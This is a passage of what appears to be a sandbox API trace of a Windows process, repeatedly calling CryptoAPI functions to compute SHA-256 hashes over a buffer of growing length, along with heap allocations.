	[0201.812] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0201.812] CryptReleaseContext (hProv=0x2251f8, dwFlags=0x0) returned 1
	[0201.813] CryptAcquireContextW (in: phProv=0x129428, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129428*=0x2251f8) returned 1
	[0201.813] CryptCreateHash (in: hProv=0x2251f8, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12942c | out: phHash=0x12942c) returned 1
	[0201.813] CryptHashData (hHash=0x22b6980, pbData=0x2756bf0, dwDataLen=0x300, dwFlags=0x0) returned 1
	[0201.813] CryptGetHashParam (in: hHash=0x22b6980, dwParam=0x4, pbData=0x129424, pdwDataLen=0x129420, dwFlags=0x0 | out: pbData=0x129424, pdwDataLen=0x129420) returned 1
	[0201.813] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26c9790
	[0201.813] CryptGetHashParam (in: hHash=0x22b6980, dwParam=0x2, pbData=0x26c9790, pdwDataLen=0x129424, dwFlags=0x0 | out: pbData=0x26c9790, pdwDataLen=0x129424) returned 1
	[0201.813] CryptDestroyHash (hHash=0x22b6980) returned 1
	[0201.813] CryptReleaseContext (hProv=0x2251f8, dwFlags=0x0) returned 1
	[0201.813] CryptAcquireContextW (in: phProv=0x129428, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129428*=0x2251f8) returned 1
	[0201.813] CryptCreateHash (in: hProv=0x2251f8, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12942c | out: phHash=0x12942c) returned 1
	[0201.813] CryptHashData (hHash=0x22b6600, pbData=0x2756bf0, dwDataLen=0x320, dwFlags=0x0) returned 1
	[0201.813] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x129424, pdwDataLen=0x129420, dwFlags=0x0 | out: pbData=0x129424, pdwDataLen=0x129420) returned 1
	[0201.813] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26c97b8
	[0201.813] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x26c97b8, pdwDataLen=0x129424, dwFlags=0x0 | out: pbData=0x26c97b8, pdwDataLen=0x129424) returned 1
	[0201.813] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0201.814] CryptReleaseContext (hProv=0x2251f8, dwFlags=0x0) returned 1
	[0201.814] CryptAcquireContextW (in: phProv=0x129428, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129428*=0x2251f8) returned 1
	[0201.814] CryptCreateHash (in: hProv=0x2251f8, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12942c | out: phHash=0x12942c) returned 1
	[0201.814] CryptHashData (hHash=0x22b6980, pbData=0x2756bf0, dwDataLen=0x340, dwFlags=0x0) returned 1
	[0201.814] CryptGetHashParam (in: hHash=0x22b6980, dwParam=0x4, pbData=0x129424, pdwDataLen=0x129420, dwFlags=0x0 | out: pbData=0x129424, pdwDataLen=0x129420) returned 1
	[0201.814] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26c97e0
	[0201.814] CryptGetHashParam (in: hHash=0x22b6980, dwParam=0x2, pbData=0x26c97e0, pdwDataLen=0x129424, dwFlags=0x0 | out: pbData=0x26c97e0, pdwDataLen=0x129424) returned 1
	[0201.814] CryptDestroyHash (hHash=0x22b6980) returned 1
	[0201.814] CryptReleaseContext (hProv=0x2251f8, dwFlags=0x0) returned 1
	[0201.814] CryptAcquireContextW (in: phProv=0x129428, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129428*=0x2251f8) returned 1
	[0201.814] CryptCreateHash (in: hProv=0x2251f8, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12942c | out: phHash=0x12942c) returned 1
	[0201.814] CryptHashData (hHash=0x22b6600, pbData=0x2756bf0, dwDataLen=0x360, dwFlags=0x0) returned 1
	[0201.814] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x129424, pdwDataLen=0x129420, dwFlags=0x0 | out: pbData=0x129424, pdwDataLen=0x129420) returned 1
	[0201.814] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26c9808
	[0201.814] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x26c9808, pdwDataLen=0x129424, dwFlags=0x0 | out: pbData=0x26c9808, pdwDataLen=0x129424) returned 1
	[0201.814] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0201.814] CryptReleaseContext (hProv=0x2251f8, dwFlags=0x0) returned 1
	[0201.814] CryptAcquireContextW (in: phProv=0x129428, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129428*=0x2251f8) returned 1
	[0201.815] CryptCreateHash (in: hProv=0x2251f8, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12942c | out: phHash=0x12942c) returned 1
	[0201.815] CryptHashData (hHash=0x22b6980, pbData=0x2756bf0, dwDataLen=0x380, dwFlags=0x0) returned 1
	[0201.815] CryptGetHashParam (in: hHash=0x22b6980, dwParam=0x4, pbData=0x129424, pdwDataLen=0x129420, dwFlags=0x0 | out: pbData=0x129424, pdwDataLen=0x129420) returned 1
	[0201.815] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26c9830
	[0201.815] CryptGetHashParam (in: hHash=0x22b6980, dwParam=0x2, pbData=0x26c9830, pdwDataLen=0x129424, dwFlags=0x0 | out: pbData=0x26c9830, pdwDataLen=0x129424) returned 1
	[0201.815] CryptDestroyHash (hHash=0x22b6980) returned 1
	[0201.815] CryptReleaseContext (hProv=0x2251f8, dwFlags=0x0) returned 1
	[0201.815] CryptAcquireContextW (in: phProv=0x129428, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129428*=0x2251f8) returned 1
	[0201.815] CryptCreateHash (in: hProv=0x2251f8, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12942c | out: phHash=0x12942c) returned 1
	[0201.815] CryptHashData (hHash=0x22b6600, pbData=0x2756bf0, dwDataLen=0x3a0, dwFlags=0x0) returned 1
	[0201.815] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x129424, pdwDataLen=0x129420, dwFlags=0x0 | out: pbData=0x129424, pdwDataLen=0x129420) returned 1
	[0201.815] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26c9858
	[0201.815] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x26c9858, pdwDataLen=0x129424, dwFlags=0x0 | out: pbData=0x26c9858, pdwDataLen=0x129424) returned 1
	[0201.815] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0201.815] CryptReleaseContext (hProv=0x2251f8, dwFlags=0x0) returned 1
	[0201.815] CryptAcquireContextW (in: phProv=0x129428, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129428*=0x2251f8) returned 1
	[0201.816] CryptCreateHash (in: hProv=0x2251f8, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12942c | out: phHash=0x12942c) returned 1
	[0201.816] CryptHashData (hHash=0x22b6980, pbData=0x2756bf0, dwDataLen=0x3c0, dwFlags=0x0) returned 1
	[0201.816] CryptGetHashParam (in: hHash=0x22b6980, dwParam=0x4, pbData=0x129424, pdwDataLen=0x129420, dwFlags=0x0 | out: pbData=0x129424, pdwDataLen=0x129420) returned 1
	[0201.816] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26c9880
	[0201.816] CryptGetHashParam (in: hHash=0x22b6980, dwParam=0x2, pbData=0x26c9880, pdwDataLen=0x129424, dwFlags=0x0 | out: pbData=0x26c9880, pdwDataLen=0x129424) returned 1
	[0201.816] CryptDestroyHash (hHash=0x22b6980) returned 1
	[0201.816] CryptReleaseContext (hProv=0x2251f8, dwFlags=0x0) returned 1
	[0201.816] CryptAcquireContextW (in: phProv=0x129428, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129428*=0x2251f8) returned 1
	[0201.816] CryptCreateHash (in: hProv=0x2251f8, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12942c | out: phHash=0x12942c) returned 1
	[0201.816] CryptHashData (hHash=0x22b6600, pbData=0x2756bf0, dwDataLen=0x3e0, dwFlags=0x0) returned 1
	[0201.816] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x129424, pdwDataLen=0x129420, dwFlags=0x0 | out: pbData=0x129424, pdwDataLen=0x129420) returned 1
	[0201.816] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26c98a8
	[0201.816] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x26c98a8, pdwDataLen=0x129424, dwFlags=0x0 | out: pbData=0x26c98a8, pdwDataLen=0x129424) returned 1
	[0201.816] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0201.816] CryptReleaseContext (hProv=0x2251f8, dwFlags=0x0) returned 1
	[0201.816] CryptAcquireContextW (in: phProv=0x129428, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129428*=0x2251f8) returned 1
	[0201.817] CryptCreateHash (in: hProv=0x2251f8, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12942c | out: phHash=0x12942c) returned 1
	[0201.817] CryptHashData (hHash=0x22b6980, pbData=0x2756bf0, dwDataLen=0x400, dwFlags=0x0) returned 1
	[0201.817] CryptGetHashParam (in: hHash=0x22b6980, dwParam=0x4, pbData=0x129424, pdwDataLen=0x129420, dwFlags=0x0 | out: pbData=0x129424, pdwDataLen=0x129420) returned 1
	[0201.817] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26c98d0
	[0201.817] CryptGetHashParam (in: hHash=0x22b6980, dwParam=0x2, pbData=0x26c98d0, pdwDataLen=0x129424, dwFlags=0x0 | out: pbData=0x26c98d0, pdwDataLen=0x129424) returned 1
	[0201.817] CryptDestroyHash (hHash=0x22b6980) returned 1
	[0201.817] CryptReleaseContext (hProv=0x2251f8, dwFlags=0x0) returned 1
	[0201.817] CryptAcquireContextW (in: phProv=0x129428, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129428*=0x2251f8) returned 1
	[0201.817] CryptCreateHash (in: hProv=0x2251f8, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12942c | out: phHash=0x12942c) returned 1
	[0201.817] CryptHashData (hHash=0x22b6600, pbData=0x2756bf0, dwDataLen=0x420, dwFlags=0x0) returned 1
	[0201.817] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x129424, pdwDataLen=0x129420, dwFlags=0x0 | out: pbData=0x129424, pdwDataLen=0x129420) returned 1
	[0201.817] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26c98f8
	[0201.817] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x26c98f8, pdwDataLen=0x129424, dwFlags=0x0 | out: pbData=0x26c98f8, pdwDataLen=0x129424) returned 1
	[0201.817] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0201.817] CryptReleaseContext (hProv=0x2251f8, dwFlags=0x0) returned 1
	[0201.817] CryptAcquireContextW (in: phProv=0x129428, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129428*=0x2251f8) returned 1
	[0201.818] CryptCreateHash (in: hProv=0x2251f8, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12942c | out: phHash=0x12942c) returned 1
	[0201.818] CryptHashData (hHash=0x22b6980, pbData=0x2756bf0, dwDataLen=0x440, dwFlags=0x0) returned 1
	[0201.818] CryptGetHashParam (in: hHash=0x22b6980, dwParam=0x4, pbData=0x129424, pdwDataLen=0x129420, dwFlags=0x0 | out: pbData=0x129424, pdwDataLen=0x129420) returned 1
	[0201.818] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26c9920
	[0201.818] CryptGetHashParam (in: hHash=0x22b6980, dwParam=0x2, pbData=0x26c9920, pdwDataLen=0x129424, dwFlags=0x0 | out: pbData=0x26c9920, pdwDataLen=0x129424) returned 1
	[0201.818] CryptDestroyHash (hHash=0x22b6980) returned 1
	[0201.818] CryptReleaseContext (hProv=0x2251f8, dwFlags=0x0) returned 1
	[0201.818] CryptAcquireContextW (in: phProv=0x129428, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129428*=0x2251f8) returned 1
	[0201.818] CryptCreateHash (in: hProv=0x2251f8, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12942c | out: phHash=0x12942c) returned 1
	[0201.818] CryptHashData (hHash=0x22b6600, pbData=0x2756bf0, dwDataLen=0x460, dwFlags=0x0) returned 1
	[0201.818] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x129424, pdwDataLen=0x129420, dwFlags=0x0 | out: pbData=0x129424, pdwDataLen=0x129420) returned 1
	[0201.818] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26c9948
	[0201.818] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x26c9948, pdwDataLen=0x129424, dwFlags=0x0 | out: pbData=0x26c9948, pdwDataLen=0x129424) returned 1
	[0201.818] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0201.818] CryptReleaseContext (hProv=0x2251f8, dwFlags=0x0) returned 1
	[0201.819] CryptAcquireContextW (in: phProv=0x129428, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129428*=0x2251f8) returned 1
	[0201.819] CryptCreateHash (in: hProv=0x2251f8, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12942c | out: phHash=0x12942c) returned 1
	[0201.819] CryptHashData (hHash=0x22b6980, pbData=0x2756bf0, dwDataLen=0x480, dwFlags=0x0) returned 1
	[0201.819] CryptGetHashParam (in: hHash=0x22b6980, dwParam=0x4, pbData=0x129424, pdwDataLen=0x129420, dwFlags=0x0 | out: pbData=0x129424, pdwDataLen=0x129420) returned 1
	[0201.819] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26c9970
	[0201.819] CryptGetHashParam (in: hHash=0x22b6980, dwParam=0x2, pbData=0x26c9970, pdwDataLen=0x129424, dwFlags=0x0 | out: pbData=0x26c9970, pdwDataLen=0x129424) returned 1
	[0201.819] CryptDestroyHash (hHash=0x22b6980) returned 1
	[0201.819] CryptReleaseContext (hProv=0x2251f8, dwFlags=0x0) returned 1
	[0201.819] CryptAcquireContextW (in: phProv=0x129428, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129428*=0x2251f8) returned 1
	[0201.819] CryptCreateHash (in: hProv=0x2251f8, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12942c | out: phHash=0x12942c) returned 1
	[0201.819] CryptHashData (hHash=0x22b6600, pbData=0x2756bf0, dwDataLen=0x4a0, dwFlags=0x0) returned 1
	[0201.819] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x129424, pdwDataLen=0x129420, dwFlags=0x0 | out: pbData=0x129424, pdwDataLen=0x129420) returned 1
	[0201.819] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26c9998
	[0201.819] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x26c9998, pdwDataLen=0x129424, dwFlags=0x0 | out: pbData=0x26c9998, pdwDataLen=0x129424) returned 1
	[0201.819] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0201.819] CryptReleaseContext (hProv=0x2251f8, dwFlags=0x0) returned 1
	[0201.819] CryptAcquireContextW (in: phProv=0x129428, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129428*=0x2251f8) returned 1
	[0201.820] CryptCreateHash (in: hProv=0x2251f8, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12942c | out: phHash=0x12942c) returned 1
	[0201.820] CryptHashData (hHash=0x22b6980, pbData=0x2756bf0, dwDataLen=0x4c0, dwFlags=0x0) returned 1
	[0201.820] CryptGetHashParam (in: hHash=0x22b6980, dwParam=0x4, pbData=0x129424, pdwDataLen=0x129420, dwFlags=0x0 | out: pbData=0x129424, pdwDataLen=0x129420) returned 1
	[0201.820] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26c99c0
	[0201.820] CryptGetHashParam (in: hHash=0x22b6980, dwParam=0x2, pbData=0x26c99c0, pdwDataLen=0x129424, dwFlags=0x0 | out: pbData=0x26c99c0, pdwDataLen=0x129424) returned 1
	[0201.820] CryptDestroyHash (hHash=0x22b6980) returned 1
	[0201.820] CryptReleaseContext (hProv=0x2251f8, dwFlags=0x0) returned 1
	[0201.820] CryptAcquireContextW (in: phProv=0x129428, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129428*=0x2251f8) returned 1
	[0201.820] CryptCreateHash (in: hProv=0x2251f8, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12942c | out: phHash=0x12942c) returned 1
	[0201.820] CryptHashData (hHash=0x22b6600, pbData=0x2756bf0, dwDataLen=0x4e0, dwFlags=0x0) returned 1
	[0201.820] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x129424, pdwDataLen=0x129420, dwFlags=0x0 | out: pbData=0x129424, pdwDataLen=0x129420) returned 1
	[0201.820] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26c99e8
	[0201.820] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x26c99e8, pdwDataLen=0x129424, dwFlags=0x0 | out: pbData=0x26c99e8, pdwDataLen=0x129424) returned 1
	[0201.820] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0201.820] CryptReleaseContext (hProv=0x2251f8, dwFlags=0x0) returned 1
	[0201.820] CryptAcquireContextW (in: phProv=0x129428, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129428*=0x2251f8) returned 1
	[0201.821] CryptCreateHash (in: hProv=0x2251f8, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12942c | out: phHash=0x12942c) returned 1
	[0201.821] CryptHashData (hHash=0x22b6980, pbData=0x2756bf0, dwDataLen=0x500, dwFlags=0x0) returned 1
	[0201.821] CryptGetHashParam (in: hHash=0x22b6980, dwParam=0x4, pbData=0x129424, pdwDataLen=0x129420, dwFlags=0x0 | out: pbData=0x129424, pdwDataLen=0x129420) returned 1
	[0201.821] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26c9a10
	[0201.821] CryptGetHashParam (in: hHash=0x22b6980, dwParam=0x2, pbData=0x26c9a10, pdwDataLen=0x129424, dwFlags=0x0 | out: pbData=0x26c9a10, pdwDataLen=0x129424) returned 1
	[0201.821] CryptDestroyHash (hHash=0x22b6980) returned 1
	[0201.821] CryptReleaseContext (hProv=0x2251f8, dwFlags=0x0) returned 1
	[0201.821] CryptAcquireContextW (in: phProv=0x129428, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129428*=0x2251f8) returned 1
	[0201.821] CryptCreateHash (in: hProv=0x2251f8, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12942c | out: phHash=0x12942c) returned 1
	[0201.821] CryptHashData (hHash=0x22b6600, pbData=0x2756bf0, dwDataLen=0x520, dwFlags=0x0) returned 1
	[0201.821] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x129424, pdwDataLen=0x129420, dwFlags=0x0 | out: pbData=0x129424, pdwDataLen=0x129420) returned 1
	[0201.821] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26c9a38
	[0201.821] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x26c9a38, pdwDataLen=0x129424, dwFlags=0x0 | out: pbData=0x26c9a38, pdwDataLen=0x129424) returned 1
	[0201.821] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0201.821] CryptReleaseContext (hProv=0x2251f8, dwFlags=0x0) returned 1
	[0201.821] CryptAcquireContextW (in: phProv=0x129428, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129428*=0x2251f8) returned 1
	[0201.822] CryptCreateHash (in: hProv=0x2251f8, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12942c | out: phHash=0x12942c) returned 1
	[0201.822] CryptHashData (hHash=0x22b6980, pbData=0x2756bf0, dwDataLen=0x540, dwFlags=0x0) returned 1
	[0201.822] CryptGetHashParam (in: hHash=0x22b6980, dwParam=0x4, pbData=0x129424, pdwDataLen=0x129420, dwFlags=0x0 | out: pbData=0x129424, pdwDataLen=0x129420) returned 1
	[0201.822] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26c9a60
	[0201.822] CryptGetHashParam (in: hHash=0x22b6980, dwParam=0x2, pbData=0x26c9a60, pdwDataLen=0x129424, dwFlags=0x0 | out: pbData=0x26c9a60, pdwDataLen=0x129424) returned 1
	[0201.822] CryptDestroyHash (hHash=0x22b6980) returned 1
	[0201.822] CryptReleaseContext (hProv=0x2251f8, dwFlags=0x0) returned 1
	[0201.822] CryptAcquireContextW (in: phProv=0x129428, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129428*=0x2251f8) returned 1
	[0201.822] CryptCreateHash (in: hProv=0x2251f8, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12942c | out: phHash=0x12942c) returned 1
	[0201.822] CryptHashData (hHash=0x22b6600, pbData=0x2756bf0, dwDataLen=0x560, dwFlags=0x0) returned 1
	[0201.822] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x129424, pdwDataLen=0x129420, dwFlags=0x0 | out: pbData=0x129424, pdwDataLen=0x129420) returned 1
	[0201.822] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26c9a88
	[0201.822] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x26c9a88, pdwDataLen=0x129424, dwFlags=0x0 | out: pbData=0x26c9a88, pdwDataLen=0x129424) returned 1
	[0201.822] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0201.822] CryptReleaseContext (hProv=0x2251f8, dwFlags=0x0) returned 1
	[0201.822] CryptAcquireContextW (in: phProv=0x129428, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129428*=0x2251f8) returned 1
	[0201.823] CryptCreateHash (in: hProv=0x2251f8, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12942c | out: phHash=0x12942c) returned 1
	[0201.823] CryptHashData (hHash=0x22b6980, pbData=0x2756bf0, dwDataLen=0x580, dwFlags=0x0) returned 1
	[0201.823] CryptGetHashParam (in: hHash=0x22b6980, dwParam=0x4, pbData=0x129424, pdwDataLen=0x129420, dwFlags=0x0 | out: pbData=0x129424, pdwDataLen=0x129420) returned 1
	[0201.823] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26c9ab0
	[0201.823] CryptGetHashParam (in: hHash=0x22b6980, dwParam=0x2, pbData=0x26c9ab0, pdwDataLen=0x129424, dwFlags=0x0 | out: pbData=0x26c9ab0, pdwDataLen=0x129424) returned 1
	[0201.823] CryptDestroyHash (hHash=0x22b6980) returned 1
	[0201.823] CryptReleaseContext (hProv=0x2251f8, dwFlags=0x0) returned 1
	[0201.823] CryptAcquireContextW (in: phProv=0x129428, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129428*=0x2251f8) returned 1
	[0201.823] CryptCreateHash (in: hProv=0x2251f8, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12942c | out: phHash=0x12942c) returned 1
	[0201.823] CryptHashData (hHash=0x22b6600, pbData=0x2756bf0, dwDataLen=0x5a0, dwFlags=0x0) returned 1
	[0201.823] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x129424, pdwDataLen=0x129420, dwFlags=0x0 | out: pbData=0x129424, pdwDataLen=0x129420) returned 1
	[0201.823] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26c9ad8
	[0201.823] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x26c9ad8, pdwDataLen=0x129424, dwFlags=0x0 | out: pbData=0x26c9ad8, pdwDataLen=0x129424) returned 1
	[0201.823] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0201.823] CryptReleaseContext (hProv=0x2251f8, dwFlags=0x0) returned 1
	[0201.823] CryptAcquireContextW (in: phProv=0x129428, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129428*=0x2251f8) returned 1
	[0201.824] CryptCreateHash (in: hProv=0x2251f8, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12942c | out: phHash=0x12942c) returned 1
	[0201.824] CryptHashData (hHash=0x22b6980, pbData=0x2756bf0, dwDataLen=0x5c0, dwFlags=0x0) returned 1
	[0201.824] CryptGetHashParam (in: hHash=0x22b6980, dwParam=0x4, pbData=0x129424, pdwDataLen=0x129420, dwFlags=0x0 | out: pbData=0x129424, pdwDataLen=0x129420) returned 1
	[0201.824] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26c9b00
	[0201.824] CryptGetHashParam (in: hHash=0x22b6980, dwParam=0x2, pbData=0x26c9b00, pdwDataLen=0x129424, dwFlags=0x0 | out: pbData=0x26c9b00, pdwDataLen=0x129424) returned 1
	[0201.824] CryptDestroyHash (hHash=0x22b6980) returned 1
	[0201.824] CryptReleaseContext (hProv=0x2251f8, dwFlags=0x0) returned 1
	[0201.824] CryptAcquireContextW (in: phProv=0x129428, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129428*=0x2251f8) returned 1
	[0201.824] CryptCreateHash (in: hProv=0x2251f8, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12942c | out: phHash=0x12942c) returned 1
	[0201.824] CryptHashData (hHash=0x22b6600, pbData=0x2756bf0, dwDataLen=0x5e0, dwFlags=0x0) returned 1
	[0201.824] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x129424, pdwDataLen=0x129420, dwFlags=0x0 | out: pbData=0x129424, pdwDataLen=0x129420) returned 1
	[0201.824] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26c9b28
	[0201.824] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x26c9b28, pdwDataLen=0x129424, dwFlags=0x0 | out: pbData=0x26c9b28, pdwDataLen=0x129424) returned 1
	[0201.824] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0201.824] CryptReleaseContext (hProv=0x2251f8, dwFlags=0x0) returned 1
	[0201.824] CryptAcquireContextW (in: phProv=0x129428, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129428*=0x2251f8) returned 1
	[0201.825] CryptCreateHash (in: hProv=0x2251f8, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12942c | out: phHash=0x12942c) returned 1
	[0201.825] CryptHashData (hHash=0x22b6980, pbData=0x2756bf0, dwDataLen=0x600, dwFlags=0x0) returned 1
	[0201.825] CryptGetHashParam (in: hHash=0x22b6980, dwParam=0x4, pbData=0x129424, pdwDataLen=0x129420, dwFlags=0x0 | out: pbData=0x129424, pdwDataLen=0x129420) returned 1
	[0201.825] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26c9b50
	[0201.825] CryptGetHashParam (in: hHash=0x22b6980, dwParam=0x2, pbData=0x26c9b50, pdwDataLen=0x129424, dwFlags=0x0 | out: pbData=0x26c9b50, pdwDataLen=0x129424) returned 1
	[0201.825] CryptDestroyHash (hHash=0x22b6980) returned 1
	[0201.825] CryptReleaseContext (hProv=0x2251f8, dwFlags=0x0) returned 1
	[0201.825] CryptAcquireContextW (in: phProv=0x129428, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129428*=0x2251f8) returned 1
	[0201.825] CryptCreateHash (in: hProv=0x2251f8, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12942c | out: phHash=0x12942c) returned 1
	[0201.825] CryptHashData (hHash=0x22b6600, pbData=0x2756bf0, dwDataLen=0x620, dwFlags=0x0) returned 1
	[0201.825] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x129424, pdwDataLen=0x129420, dwFlags=0x0 | out: pbData=0x129424, pdwDataLen=0x129420) returned 1
